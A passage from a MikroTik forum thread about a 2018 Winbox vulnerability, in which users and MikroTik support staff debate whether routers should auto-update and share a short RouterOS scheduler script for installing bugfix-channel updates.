There are many routers which will never be updated or until something real bad happens.
The issue with doing that is that users won't know what is happening.
For example if they notice their internet going down their first instinct might be to reboot the router. Rebooting the router while in it is in the middle of installing an upgrade might break the router. And the aveage user will not want to learn how to use NetInstall.

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
All it takes is a simple scheduler script to make it auto update, and if you make it use the "bugfix"/"long-term" channel it will only update when it is an important update.

Maybe an example of such an auto update scheduler script should be added to the wiki/manual?
I wish my FTP was FTL.
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:07 am

 
User avatar
Deantwo
Member Candidate
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:27 am

Example is already in the manual:
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade
Ah very nice, thanks.
But it would be nice if the example also included "set channel=bugfix", since that took me a moment to find. I can't even see the word "channel" being mentioned at all on the whole page.

For example:
/system package update
set channel=bugfix
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available" ) do={ install }

EDIT: Appears to be called "release chains" on the page, here: https://wiki.mikrotik.com/wiki/Manual:U ... ase_chains
I wish my FTP was FTL.
 
spacemind
Member Candidate
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:57 am


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software when critical vulnerability is on the way.

If we buy mikrotik powerfull routers we must have this critical support.

Try to buy a Tesl.... car or other smart car with this kind of critical vulnerability and have them to tell you that you need to update the software by yourself ( and its your problem if you didn't update it...)

Best Regards
R.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 12:27 pm

I disagree. It is the job of the administrator to configure the device securerly, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firwall, or has configured his own firewall correctly.
No answer to your question? How to write posts
 
sid5632
Member Candidate
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 12:32 pm


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software
No, it you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
 
spacemind
Member Candidate
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 1:02 pm


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you'r wrong, It is MIKROTIK job to update our router's software
No, it you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
Oh... Am i wrong ? ROS has bugs, but its not windows 10, its much better, and dont forget that Mikrotik is selled all aroud the world to end customers.

Who is online

Users browsing this forum: arfoll, mducharme, Spirch and 10 guests